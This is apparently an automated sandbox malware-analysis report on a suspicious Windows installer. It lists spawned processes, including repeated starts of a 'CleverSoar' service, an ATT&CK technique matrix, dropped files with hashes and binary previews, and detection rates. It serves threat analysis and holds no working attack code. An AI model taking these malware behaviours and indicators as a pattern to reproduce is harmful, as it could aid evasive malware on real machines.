Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

Code function: 6_2_6CAF7720 cpuid

6_2_6CAF7720

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_00AFAB2A GetSystemTimeAsFileTime,

10_2_00AFAB2A

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_00B90090 GetVersion,

10_2_00B90090

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2268261288.00000000015B3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Windows Service	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Windows Service	1 Disable or Modify Tools	LSASS Memory	331 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	Logon Script (Windows)	111 Process Injection	231 Virtualization/Sandbox Evasion	Security Account Manager	231 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Native API	Login Hook	1 DLL Side-Loading	1 Access Token Manipulation	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	2 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	3 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Software Packing	Proc Filesystem	35 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#U5b89#U88c5#U52a9#U624b_2.0.6.exe	7%	Virustotal		Browse
#U5b89#U88c5#U52a9#U624b_2.0.6.exe	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\Windows NT\7zr.exe	0%	ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc	11%	ReversingLabs
C:\Program Files (x86)\Windows NT\is-0F5J3.tmp	0%	ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll	9%	ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\update.vac	11%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\update.vac	11%	ReversingLabs

Name	Source	Malicious	Reputation
https://aria2.github.io/Usage:	#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	false	high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	#U5b89#U88c5#U52a9#U624b_2.0.6.exe	false	high
https://github.com/aria2/aria2/issuesReport	#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	false	high
http://www.metalinker.org/	#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	false	high
https://www.remobjects.com/ps	#U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080391705.000000007EF3B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080019112.0000000003390000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000000.2082091796.00000000007C1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000000.2103564048.000000000115D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr	false	high
https://aria2.github.io/	#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	false	high
https://github.com/aria2/aria2/issues	#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	false	high
https://www.innosetup.com/	#U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080391705.000000007EF3B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080019112.0000000003390000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000000.2082091796.00000000007C1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000000.2103564048.000000000115D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr	false	high
http://www.metalinker.org/basic_string::_M_construct	#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	false	high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579778
Start date and time:	2024-12-23 08:59:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	110
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Critical Process Termination
Sample name:	#U5b89#U88c5#U52a9#U624b_2.0.6.exe renamed because original name is a hash value
Original Sample Name:	_2.0.6.exe
Detection:	MAL
Classification:	mal88.evad.winEXE@134/32@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 76% Number of executed functions: 28 Number of non-executed functions: 76
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 2.22.50.144, 2.22.50.131, 52.165.164.15, 13.107.246.63
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, dns.msftncsi.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:00:04	API Interceptor	1x Sleep call for process: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp modified
03:00:07	API Interceptor	26x Sleep call for process: powershell.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\Windows NT\7zr.exe	#U5b89#U88c5#U52a9#U624b_2.0.7.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b_2.0.7.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b_2.0.5.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b_2.0.4.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b_2.0.5.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b_2.0.4.exe	Get hash	malicious	Unknown	Browse
	Zt43pLXYiu.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b_1.0.9.exe	Get hash	malicious	Unknown	Browse
	Zt43pLXYiu.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b_1.0.1.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\Windows NT\7zr.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	831200
Entropy (8bit):	6.671005303304742
Encrypted:	false
SSDEEP:	24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5:	84DC4B92D860E8AEA55D12B1E87EA108
SHA1:	56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256:	BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512:	CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse Filename: Zt43pLXYiu.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse Filename: Zt43pLXYiu.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.\| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..\| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\Windows NT\file.bin (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	data
Category:	dropped
Size (bytes):	249968
Entropy (8bit):	7.99927878301746
Encrypted:	true
SSDEEP:	6144:5MLDlV3MdqekCZrPDP+wYg19iyvziHx3WuJFK/iPon8JC:yLDX3Md2oDPJBiyvzsx35JcAEP
MD5:	E2189A19182C781773E5E291B61A5E47
SHA1:	3F47ADA8A171B2985DCE45E9534DC595D9215039
SHA-256:	AA6F63F4B8720AB33572ECB533359D255423003DC37C6D9C171EE20F9717A41B
SHA-512:	2329C8637E3AD42ACDE2E547D68315E9750A15D499E781F14051D067BB4913FBDFCA5507894025D8D3C3570A69CD3B438C75C951849392D5497A9AB775192360
Malicious:	false
Preview:	.@S.......q.,..............Ho..M....Z<..3 .hM.pV.j.8.+r@...l.q...o7&2.@L/..^:..B..E..}).\).4....?..A..U.<......=.:.kt.^n..b...M..8....g@..z..\|.Om.....[%.\|.<.hn....i....Q.\....2M.@........=.M..Vu......%]......}J..:H.Q.c.F.`..Y..u..^d...q...t...a&.3.9....C....g.qi.F.,Q.M..e.).5.#.\|........u...K#.e....}.c..B..g6.......#5...6.5....t....../Pb.".S....Vx.Z].0...U..K.L......9u.. k.....XM.;.....<#.....u.\|...K.B,h.B..:..^1H:..c.....B&.HC..W.j..A......i..T.3....Q...R.W..\|..=.........l.sz.B.F...........+./..Va.........y...%c<^r2.d...5...k.,....r.z.JuP.M.q.....&...2.=7...X..x./....ck_<1f.OZ>5.......{N..{.....F..".$su..Q...}*!.....S.ZZ&O..J5&...\|fv&.......s.y@..%...'wci..."I..-\|.R..7)..j.....r..\.g...\|..(."e)..^.`.b.....!.;.+.c..l.).\|}.0.B.....4.]~...........U..r..7A..B..w.lUdx8..{y+tr.@...Q..4J6..(ZS.4x....MB.w..o..M..z..kw..s.{...W...6.L.\|m.B.B..q..m.....4.#..I...mu. ...g#1f...B.(.Jj.#....+....D.{3......... "...../....^/A.4.V...,.%

C:\Program Files (x86)\Windows NT\hrsw.vbc

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3598848
Entropy (8bit):	7.004949099807939
Encrypted:	false
SSDEEP:	49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
MD5:	1D1464C73252978A58AC925ECE57F0FB
SHA1:	30E442BE965F96F3EB75A3ABDB61B90E5A506993
SHA-256:	05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
SHA-512:	40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Windows NT\is-0F5J3.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5649408
Entropy (8bit):	6.392614480390128
Encrypted:	false
SSDEEP:	98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
MD5:	8C71B86BF407C05BAF11E8D296B9C8B8
SHA1:	6624AB8CA883C48F02C58250D4EEE9E90098F4E4
SHA-256:	BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
SHA-512:	BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..\|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................

C:\Program Files (x86)\Windows NT\is-QJ471.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	data
Category:	dropped
Size (bytes):	249968
Entropy (8bit):	7.99927878301746
Encrypted:	true
SSDEEP:	6144:5MLDlV3MdqekCZrPDP+wYg19iyvziHx3WuJFK/iPon8JC:yLDX3Md2oDPJBiyvzsx35JcAEP
MD5:	E2189A19182C781773E5E291B61A5E47
SHA1:	3F47ADA8A171B2985DCE45E9534DC595D9215039
SHA-256:	AA6F63F4B8720AB33572ECB533359D255423003DC37C6D9C171EE20F9717A41B
SHA-512:	2329C8637E3AD42ACDE2E547D68315E9750A15D499E781F14051D067BB4913FBDFCA5507894025D8D3C3570A69CD3B438C75C951849392D5497A9AB775192360
Malicious:	false
Preview:	.@S.......q.,..............Ho..M....Z<..3 .hM.pV.j.8.+r@...l.q...o7&2.@L/..^:..B..E..}).\).4....?..A..U.<......=.:.kt.^n..b...M..8....g@..z..\|.Om.....[%.\|.<.hn....i....Q.\....2M.@........=.M..Vu......%]......}J..:H.Q.c.F.`..Y..u..^d...q...t...a&.3.9....C....g.qi.F.,Q.M..e.).5.#.\|........u...K#.e....}.c..B..g6.......#5...6.5....t....../Pb.".S....Vx.Z].0...U..K.L......9u.. k.....XM.;.....<#.....u.\|...K.B,h.B..:..^1H:..c.....B&.HC..W.j..A......i..T.3....Q...R.W..\|..=.........l.sz.B.F...........+./..Va.........y...%c<^r2.d...5...k.,....r.z.JuP.M.q.....&...2.=7...X..x./....ck_<1f.OZ>5.......{N..{.....F..".$su..Q...}*!.....S.ZZ&O..J5&...\|fv&.......s.y@..%...'wci..."I..-\|.R..7)..j.....r..\.g...\|..(."e)..^.`.b.....!.;.+.c..l.).\|}.0.B.....4.]~...........U..r..7A..B..w.lUdx8..{y+tr.@...Q..4J6..(ZS.4x....MB.w..o..M..z..kw..s.{...W...6.L.\|m.B.B..q..m.....4.#..I...mu. ...g#1f...B.(.Jj.#....+....D.{3......... "...../....^/A.4.V...,.%

C:\Program Files (x86)\Windows NT\locale.bin

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	56530
Entropy (8bit):	7.99637651774541
Encrypted:	true
SSDEEP:	1536:QldiGQrAFpix02EAnKbWAjZSNFZaNkbVkZ:KdQSpixn0jZ8aNk2Z
MD5:	62408EF6D7BE391AF06FF367F7903B35
SHA1:	D2E8544834EAA45092C21ABDD35397F53A61BDF8
SHA-256:	583A6E6D26FD9D7D6975B554AC5D2CCD40CE043165DA10496BD816FD90A67BE3
SHA-512:	F7D4C73D4D2E6D77E1B7CAE1BB3D1BB5728EEDAD93F285B5CE4269F05D0BD18CD4D2A6B8E787BA4C4B68895829AB52794B76A75397FC9932675C4C27424FCB53
Malicious:	false
Preview:	.@S....K9..\| ................W>.L.R.ap...-..E.t.r.p..k.....Kb.....G....3...93.....Q.FaG3..!K.ml=..AF?Q6.r....Hn]".;.....W....x.,...3-c..5.......Q.nU....F.D^z..........S.....e3....{.......K>........$r7.!...X..LL..L...(..h.._...`o<..;%3F.k.....).H........l..e..V=lp........3......"h...{..`@..b......T...2....../E.Jb....v..)...... .....a...zY.....+...A`../>....$....l.........}Y...h%6\..p.`((n.R...K...?2.Y..=..+..D.9.~.m23.6.-N2..6v..*........-G~23.W..!v .....y.X..hG".iw.;....TD....Z_Z. ..-..w$G....M.L......Nj..8......i.w.M.........4'UR.......@_L...6...@.%Y\|5c...xX..4^.V...I..........]W. C...\|..P.aka)B....R...N..=3z......^s..b[l.....d.7./...\|....[}..vl....B..)U.o.......cIc`%..N5....^.q.46..IB(...5k....r`].W.i~.W.....&5..p(.....y%i....[.!..../.mU.h.H.=.....h....L^...9J~..d..}..L...u..8?.5...3l.u&.....>U......c=...4.\|.YAI.J...G...7..l...ZZ.....P...4`.........q.....}#F.V.3V.....X....1.....c^.....na.P...f.XnT...I..S...:bH..".......%.k..{.v..:{M.-.(

C:\Program Files (x86)\Windows NT\locale.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	56530
Entropy (8bit):	7.996376517745408
Encrypted:	true
SSDEEP:	768:5F38jWqODNfje3cm9SMYiRa8kvZLchG+VW2RmGoK8zgz/u2mf+gADbRfbfVx1T5L:nsjwdjex/YAa8kRSKgJdz/ugbRfbpeo
MD5:	3EE722D929C33891B48311FA072C2F9A
SHA1:	9FB8341A371FAAEC12868477C69DF5604733784A
SHA-256:	7CEB7F0967524EE351171162B79AD283D435BD0EDCE411FBFCE1B29421A4EB54
SHA-512:	6B4046540AE9B20699E0F8BE89558F52226F7297DAFB8810DF7812CD5429164C7AC8B689F51FDA3BE4EE374D5D86BCE0CAD9D1062066AB2C0FA577ACE5604B76
Malicious:	false
